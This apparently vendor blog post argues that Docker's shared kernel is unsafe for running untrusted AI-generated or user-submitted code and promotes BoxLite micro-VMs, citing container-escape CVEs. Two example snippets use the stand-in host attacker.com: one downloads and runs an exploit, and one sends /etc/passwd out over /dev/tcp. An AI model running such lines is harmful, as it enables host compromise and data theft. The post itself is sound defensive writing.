TL;DR: Docker containers share the host kernel, and container escape vulnerabilities are discovered regularly. For trusted workloads you control, this risk is acceptable. For untrusted code (AI-generated, user-submitted), container escapes could be catastrophic. Hardware-isolated micro-VMs provide stronger guarantees.
Docker and other container runtimes rely on Linux kernel features for isolation: namespaces partition what a process can see (PIDs, mounts, network interfaces, users), cgroups limit what it can consume, and capabilities plus seccomp filters restrict which privileged operations and system calls it can make.
Together, these create a strong isolation boundary for trusted workloads.
The catch: all containers share the host kernel. The Linux kernel is tens of millions of lines of code, exposes hundreds of system calls, and contains many complex subsystems (networking, filesystems, memory management), all reachable from inside a container.
Any vulnerability in these subsystems can potentially be exploited from inside a container to escape to the host.
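You can see the shared kernel for yourself. A minimal sketch, assuming Docker is installed and can pull the `alpine` image; `uname -r` inside the container reports the host’s kernel release because the container has no kernel of its own:

```python
import platform
import subprocess

# Kernel release as seen by the host
host_kernel = platform.release()

# Kernel release as seen from inside a container
container_kernel = subprocess.run(
    ["docker", "run", "--rm", "alpine", "uname", "-r"],
    capture_output=True, text=True, check=True,
).stdout.strip()

print(f"host:      {host_kernel}")
print(f"container: {container_kernel}")  # same value: there is only one kernel
```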
Container escapes aren’t theoretical. Here are some notable examples:
- CVE-2024-21626 (runc, January 2024): a leaked file descriptor in `/proc/self/fd` handling during container creation let a malicious image or entrypoint gain access to the host filesystem.
- CVE-2020-15257 (containerd, November 2020): the containerd-shim API was reachable over an abstract Unix socket from containers running in the host network namespace, allowing escalation to root on the host.
- CVE-2019-5736 (runc, February 2019): a container process could overwrite the host `runc` binary via `/proc/self/exe` and execute code as root the next time any container was run.
- CVE-2022-0185 (Linux kernel, January 2022): a heap overflow in the filesystem context API, exploitable from an unprivileged user namespace, allowed escaping the container and compromising the host.
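If you want to check whether a host predates the runc fix above, something like the following works as a starting point (a sketch only; per the upstream advisory, CVE-2024-21626 was fixed in runc 1.1.12, but always confirm against the advisory for your distribution):

```python
import subprocess

def version_of(cmd: list[str]) -> str:
    """Return the first line of a version command's output, or a note if it fails."""
    try:
        out = subprocess.run(cmd, capture_output=True, text=True, check=True).stdout
        return out.splitlines()[0]
    except (FileNotFoundError, subprocess.CalledProcessError) as exc:
        return f"unavailable ({exc})"

# Compare against the advisories above, e.g. runc < 1.1.12 is affected by CVE-2024-21626.
print("runc:  ", version_of(["runc", "--version"]))
print("docker:", version_of(["docker", "--version"]))
print("kernel:", version_of(["uname", "-r"]))
```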
Container runtimes are designed assuming you trust the code. The isolation protects against accidents: a buggy process interfering with its neighbors, dependency conflicts, one service exhausting shared resources.
They’re not designed to contain actively malicious code trying to escape.
AI agents generate code that you didn’t write and can’t fully predict:
```python
# AI agent might generate something like this
import subprocess

subprocess.run(["curl", "-o", "/dev/shm/x", "http://attacker.com/exploit"])
subprocess.run(["chmod", "+x", "/dev/shm/x"])
subprocess.run(["/dev/shm/x"])  # Runs exploit targeting container escape
```
Online judges, coding tutorials, and playgrounds run arbitrary user code:
```python
# User submits this "solution"
__import__('os').system('cat /etc/passwd > /dev/tcp/attacker.com/1234')
```
When customer code runs on your infrastructure, a container escape means an attacker can reach the host, every other tenant’s container on that machine, and whatever credentials and data live there.
Some argue you can harden containers sufficiently: drop all capabilities, apply a strict seccomp profile, run rootless with user namespaces, mount the root filesystem read-only, layer on AppArmor or SELinux policies.
These help. But they’re all layers on top of the fundamental shared-kernel architecture. Zero-days in the kernel bypass all of them.
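For reference, a hardened invocation along these lines might look like the sketch below (the flags are standard Docker options; the exact set you need depends on the workload):

```python
import subprocess

def run_hardened(code: str) -> subprocess.CompletedProcess:
    # Each flag narrows the attack surface, but the code still issues
    # system calls to the same shared host kernel.
    return subprocess.run([
        "docker", "run", "--rm",
        "--network=none",                       # no network access
        "--cap-drop=ALL",                       # no Linux capabilities
        "--security-opt", "no-new-privileges",  # no privilege escalation via setuid
        "--read-only",                          # read-only root filesystem
        "--pids-limit=64",                      # contain fork bombs
        "--memory=256m", "--cpus=0.5",          # resource caps
        "--user", "65534:65534",                # run as nobody
        "python:slim", "python", "-c", code,
    ], capture_output=True, text=True)
```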
Virtual machines provide a fundamentally different isolation boundary:
Container Model:

```
┌─────────────┬─────────────┐
│ Container A │ Container B │
├─────────────┴─────────────┤
│        Host Kernel        │  ← Shared!
├───────────────────────────┤
│         Hardware          │
└───────────────────────────┘
```

VM Model:

```
┌─────────────┬─────────────┐
│    VM A     │    VM B     │
│ (Kernel A)  │ (Kernel B)  │  ← Separate!
├─────────────┴─────────────┤
│    Hypervisor (KVM/HV)    │  ← Tiny attack surface
├───────────────────────────┤
│         Hardware          │
└───────────────────────────┘
```
Traditional VMs boot in minutes, reserve gigabytes of memory per guest, and require heavyweight image and lifecycle management. This made VMs impractical for the container use case.
Micro-VMs like those used by BoxLite provide the hardware isolation of a VM with near-container startup times and a container-like developer experience:
```python
import boxlite

async def run_untrusted(untrusted_code: str) -> str:
    # This runs in a hardware-isolated VM, not a container
    async with boxlite.SimpleBox("python:slim") as box:
        result = await box.exec("python", "-c", untrusted_code)
        return result.stdout
```
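To convince yourself the boundary is a VM rather than a namespace, compare kernel identities. A minimal sketch, assuming `box.exec` can run arbitrary binaries from the image and that `uname` is present in `python:slim` (it is in the Debian-based image):

```python
import asyncio
import platform

import boxlite

async def show_kernels() -> None:
    async with boxlite.SimpleBox("python:slim") as box:
        guest = await box.exec("uname", "-r")
        # Unlike a container, the guest reports its own kernel release,
        # not the host's.
        print("host kernel: ", platform.release())
        print("guest kernel:", guest.stdout.strip())

asyncio.run(show_kernels())
```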
| Scenario | Recommendation |
|---|---|
| Your own microservices | Containers (Docker, Kubernetes) |
| CI/CD pipelines (your code) | Containers |
| AI agent code execution | Micro-VMs (BoxLite) |
| User-submitted code | Micro-VMs (BoxLite) |
| Multi-tenant customer code | Micro-VMs (BoxLite) |
| Compliance-sensitive workloads | Micro-VMs or traditional VMs |
If you’re currently using Docker for untrusted code, the migration is mostly mechanical:
Before (Docker):
```python
import subprocess

def run_user_code(code):
    subprocess.run([
        "docker", "run", "--rm",
        "--network=none",
        "--cap-drop=ALL",
        "python:slim",
        "python", "-c", code,
    ])
```
After (BoxLite):
```python
import boxlite

async def run_user_code(code):
    async with boxlite.SimpleBox("python:slim") as box:
        result = await box.exec("python", "-c", code)
        return result.stdout
```
Same workflow, stronger isolation.
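Calling the async version from synchronous code is a one-liner. The submission below is a hypothetical stand-in, and `run_user_code` is the BoxLite version defined above:

```python
import asyncio

# Hypothetical user submission, for illustration only
submission = "print(sum(range(10)))"

output = asyncio.run(run_user_code(submission))
print(output)  # -> 45
```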
Docker containers are excellent for deploying trusted applications. They’re fast, efficient, and well-understood.
But when running untrusted code—AI-generated scripts, user submissions, customer workloads—container isolation isn’t strong enough. The shared kernel creates a risk that can’t be fully mitigated.
Hardware-isolated micro-VMs provide the isolation guarantees you need without sacrificing the developer experience. For untrusted code, use VM isolation.
Learn more about BoxLite’s isolation model in the FAQ or comparison with Docker.